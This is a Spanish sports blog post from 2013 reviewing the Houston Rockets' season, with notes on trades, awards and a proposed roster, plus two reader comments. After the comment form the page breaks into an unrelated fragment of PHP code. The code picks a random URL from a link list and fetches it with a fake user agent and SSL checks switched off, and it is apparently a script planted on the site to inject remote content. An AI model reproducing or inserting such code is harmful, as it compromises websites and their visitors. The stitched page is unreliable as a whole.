Houston Rockets: Sobresaliente

08 de July de 2013 por txusma

Así es, no nos cortamos ni un pelo en decir que la temporada de Houston Rockets ha sido espectacular. El año pasado a pesar de que los aprobamos en nuestro resumen anual todo eran palos a Daryl Morley y en nuestro análisis de principio de temporada no parecía que la situación hubiera cambiado mucho. El equipo iba a la deriva, sin un futuro claro, y lo único decente parecía una hornada de jóvenes prometedores que apenas iban a competir por no ser el peor equipo de la liga. El caso es que cuando se acabó la liga la situación se había revertido completamente:  los Rockets eran uno de los mejores equipos de la liga, jóvenes, talentosos, con dinero y un mercado grande que los convertía en un equipo muy apetecible para los grandes agentes libres.

A todos nos pareció en su momento una aberración el traspaso de Kyle Lowry a cambio de apenas una primera ronda y echando la vista atrás ahora sabemos que ese movimiento fue clave en la formación de los nuevos Rockets. Esa primera ronda, Kevin Martin y el rookie Lamb fueron las piezas que consiguieron que James Harden diera con sus huesos en Houston. Así es, de la aparente nada, llegaba el, para muchos, mejor escolta de la liga tras Kobe Bryant y Dwyane Wade. Jugador joven de inmensa calidad y probado al más alto nivel para liderar el nuevo proyecto de los Rockets. Otro movimiento muy criticado fue la firma como agentes libres de Lin y Asik, parecían contratos tóxicos para la franquicia, pero nada más lejos de la realidad. Tanto Asik como Lin han demostrado que sus contratos están más que justificados, sobre todo en el caso del pívot que ha promediado un doble-doble. ¿Cuantos hombres grandes en la liga pueden decir eso cobrando 8M por temporada? El caso de Jeremy Lin podría ser más discutible pero a pesar de tener altibajos, el sabor global de la temporada ha sido satisfactorio. En él no hay una estrella pero sí un base titular sólido aunque habrá que comprobar si de verdad lo es para un equipo que quiere aspirar al anillo. El otro jugador importante en los Rockets actuales y del futuro es Chandler Parsons. El alero ha completado una excepcional temporada en la que ha sido el segundo máximo anotador del equipo y ha aportado en todos los aspectos del juego. 

Así, los nuevos Rockets con Harden al mando despertaban grandes expectativas para el futuro. Las pocas dudas que podía haber sobre si el ex escolta de los Thunder podía liderar un proyecto ganador quedaron disipadas en sus primeros encuentros en los que maravilló al mundo entero y se convirtió en un jugador top de la liga definitivamente. No obstante a pesar de los buenos rendimientos individuales, las victorias no llegaban con asiduidad y el equipo estaba en números negativos. Pero un gran mes de Diciembre con victorias ante equipos como Lakers, Boston, New York, Memphis o Chicago los catapultó a puestos de Play Off, de los que ya no saldrían nunca más. Enero fue uno de los momentos más complicados de la temporada para Houston al encadenar 7 derrotas consecutivas. El equipo pasaba por una mala racha y nada parecía funcionar pero supieron reponerse con un 8-4 antes del All-Star Weekend. En él participaron 3 jugadores, Harden en el All-Star Game, Parsons en el partido de Rookies y Sophomores y Lin en el concurso de habilidades. La marca Houston Rockets se mostraba al mundo entero.  Al borde del fin del mercado de traspasos, se producía otro movimiento que en un principio parecía de gran calado para Houston: llegaba el número 5 del Draft actual, Thomas Robinson, que parecía encajar a la perfección en las necesidades de Houston, a cambio de Aldrich, Douglas y Patterson, ninguno con un papel relevante en Houston. Para hacer hueco al jugador de los Kings, Marcus Morris se iba a los Phoenix Suns. El rendimiento del rookie fue totalmente decepcionante desde el primer día por lo que sus oportunidades y minutos fueron disminuyendo a la vez que subían los minutos de los rookies Donatas Motiejunas y Terrence Jones que dieron muchas muestras de calidad y de los que habrá que estar pendientes de cara al futuro. En cuanto al rendimiento global del equipo, el mes de Marzo supuso el mejor de toda la temporada. El equipo tenía claro que quería los Play Off a toda costa y logró la victoria en el 65% de sus partidos. Sin embargo, aún tuvieron que luchar hasta el último día.. Cuando todo apuntaba que iban a ser séptimos, el gran final de Lakers los relegó al octavo puesto de la conferencia y a un emparejamiento con Oklahoma City Thunder en primera ronda. El morbo estaba servido.

En Play Off los Rockets se enfrentaban al mejor equipo del Oeste y gran favorito al título de campeón de conferencia, equipo, que daba la casualidad que era el anterior de Harden. Es cierto que fue una serie  muy marcada por la lesión de Westbrook pero Houston puso en ciertos momentos contra las cuerdas a Oklahoma y sólo un gran Durant pudo terminar con una temporada que ha sido muy especial en Houston, en la que han pasado de ser favoritos al farolillo rojo a estar disputando eliminatorias por el título.

Houston ha sido toda la temporada uno de los mejores equipos ofensivos de la liga, concretamente ha sido el segundo equipo en puntos anotados con hasta seis jugadores en dobles dígitos de anotación y han alcanzado los 120 puntos con asiduidad. Han firmado algunos partidos espectaculares como los 140 puntos que endosaron a Golden State Warriors o los 136 que recibió Dallas Mavericks. En rebotes y asistencias han sido uno de los mejores equipos de la liga, ocupando el séptimo y sexto lugar en la liga respectivamente. La cruz viene por la defensa, apartado en el que sólo dos equipos en toda la liga han sido peores que ellos recibiendo menos puntos. Si en el futuro quieren optar a algo tienen mucho que mejorar en este apartado.

PREMIOS

MVP: La temporada de Houston Rockets empieza y acaba con James Harden. Probablemente en su posición solo tenga a Kobe Bryant por delante, y con el presumible bajón de éste, quizás la temporada que viene sea el indiscutido mejor escolta de la liga. “La barba” superó cualquier expectativa creada en torno a él. Eran altas pero las superó mostrándose desde el primer día como un jugador franquicia sólido sobre los que merece la pena reconstruir.

Rookie: A priori esta temporada iban a tener mucha importancia los rookies pero Kevin McHale apenas ha dado oportunidades a los novatos. Aún así han demostrado que pueden ser piezas sólidas en el futuro y que deben tener un hueco en este precioso proyecto. La serie de Play Off de Patrick Beverly fue muy buena y Donatas Motiejunas y Terrence Jones cuando han disfrutado de minutos han dejado muchos detalles que hacen que merezca la pena confiar en ellos.

Sorpresa: Sorpresa relativa. Chandler Parsons ya dejó muy buenas sensaciones en su temporada rookie pero es que su temporada sophomore ha sido simplemente espectacular. Es el escudero de Harden, capaz de hacer de casi de todo y muy bien. Otra sorpresa positiva la ha supuesto otro sophomore, el pívot Greg Smith ha hecho una temporada más que sólida cómo pívot suplente.

Decepción: Sin duda, Thomas Robinson. A pesar de estar un par de meses en Houston, no cuajó en ningún momento cuando a todos parecía que en Houston podía encontrar su sitio en la liga. Finalmente se ha marchado traspasado a Portland donde intentará demostrar su calidad y justificar su pick 5. Otra decepción personal es no ver en acción a Royce White que ha estado toda la temporada enzarzado con la franquicia debido a problemas personales.

Esfuerzo en vano: Aquí vamos a darle el premio a todo el equipo. Han demostrado ser un grupo con orgullo que en las situaciones difíciles reman a contracorriente para tratar de mantenerse a flote.

JUGANDO A GM

Ya no hay marcha atrás. sea como sea hay que dar el paso definitivo y luchar por el anillo. Sea quien sea hay que traer a ese jugador que nos haga dar un salto importante.

  • El primer movimiento estaba claro y ya se ha cumplido. Dwight Howard ya es un “cohete”.
  • Francisco García se había ganado la renovación tras sus buenos Play Off y así ha sido. También nos encantaría traer de vuelta a Delfino pero este es más cotizado por lo que no vamos a poder firmarlo de nuevo pues su cotización habrá subido.
  • Una vez perdido Josh Smith, que viaja a Detroit, el elegido para acompañar a Dwight Howard es Ryan Anderson. NOLA necesita un pívot para mover a A. Davis al puesto de 4 y podríamos ofrecer a Omer Asik e incluso si la operación se atasca incluiríamos una ronda.
  • A pesar de ser un base titular aceptable, Lin no termina de convencernos para este súper proyecto  pero hay pocos equipos que no tengan base y estén dispuestos a asumir el  contrato de Lin. Habíamos pensado en la posibilidad de moverlo a Philadelphia, donde mientras reconstruyen les podría hacer el papel de estrella, y en ofrecer la Mid-Level para Jarret Jack o Calderón pero ya han firmado contratos con otros equipos. Bases en el mercado apenas quedan Mo Will, que nos convence menos que Lin, y Benoh Udrih que no está para ser titular. Así que  Lin tendrá la oportunidad de demostrar que puede dirigir este equipo.
  • Por el mínimo intentaríamos firmar un veterano que nos diera defensa exterior y lanzamiento a larga distancia. Se me ocurren nombres como Michael Pietrus, aunque desconozco su estado físico. En caso de ser bueno, este sería nuestro hombre.

Así tendríamos:

Bases: Lin/Beverly
Escoltas: Harden/Anderson/Pietrus
Aleros: Parsons/García/Casspi
Ala pívot: Anderson/Jones/Motiejunas
Pivot: Howard/Greg Smith

Comenta

2 comentarios a esta entrada

  1. Esteban dice:
    #1

    Una vez perdido Josh Smith, que viaja a Detroit, el elegido para acompañar a Dwight Howard es Ryan Anderson. NOLA necesita un pívot para mover a A. Davis al puesto de 4 y podríamos ofrecer a Omer Asik e incluso si la operación se atasca incluiríamos una ronda.

    seria una exelente movida esta

    Bases: Lin/Beverly
    Escoltas: Harden/Anderson/Pietrus
    Aleros: Parsons/García/Casspi
    Ala pívot: Anderson/Jones/Motiejunas
    Pivot: Howard/Greg Smith

    hoy por hoy como esta el equipo, esta lejos de ser aspirante al titulo, a menos que parsons mejore aun mas y howard vuelva a ser el de orlando, dudo mucho que llegen lejos

    lin podria ser un sexto hombre eficas, pero no puede ser base titular de un equipo que busca campeonato, y beverly como su seguro? no hombre, eso no va a ninguna parte

    es cierto que el tandem harden y parsons es genial, pero tampoco como para no darles respiro, ni anderson, ni gargia ni casspi pueden aportar mas que berverly desde la banca, estamos frente a quizas la peor banca perimetral de la liga

    grag smith como centro suplente? un pedazo de carne

    en mi opinion, esta sobrando o terrence jones o montiejunas, son demasiados buenos ambos como para competir por ser el 4 suplente y que alguno de los dos no salga a pista

    yo moveria a montiejunas si puede armar la oferta indicada, esto es un escolta que ayude enserio desde la banca, ideal seria louis Williams, que no lo veo encajando mucho en al reconstruccion obligada de los hawks y montiejunas si

    yo ficharia a Mo, a menos que pueda hacerme de algun veterano, lease Billups…

    por otra parte creo que podrian interntar hacer un tiro por Nash, otro que no encaja ya en el proyecto laker, o buscar que estaria dispuesto a tomar minesota por ridnur o barea

    en pocas palabras, este equipo necesita un base mas “serio”, un escolta anotador y en lo posible otro pivot, como consiguen eso? entregando a montiejunas por el escolta que mencionabamos y fichando un base por el minimo

      Citar

  2. Sancho88 dice:
    #2

    Mo les vendría de perlas

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>